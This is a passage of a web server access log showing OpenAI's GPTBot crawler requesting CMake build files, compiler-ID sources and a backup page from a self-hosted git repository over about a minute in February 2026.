compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:16:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13546] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" +[17/Feb/2026:16:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" +[17/Feb/2026:16:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16418] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:16:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10560] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:16:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10560] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:16:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10538] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:16:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10562] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:16:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" +[17/Feb/2026:16:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10315] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10217] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10200] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10427] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11039] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11039] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15107] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15108] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15107] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11898] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21677] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21630] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21631] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21630] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43110] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 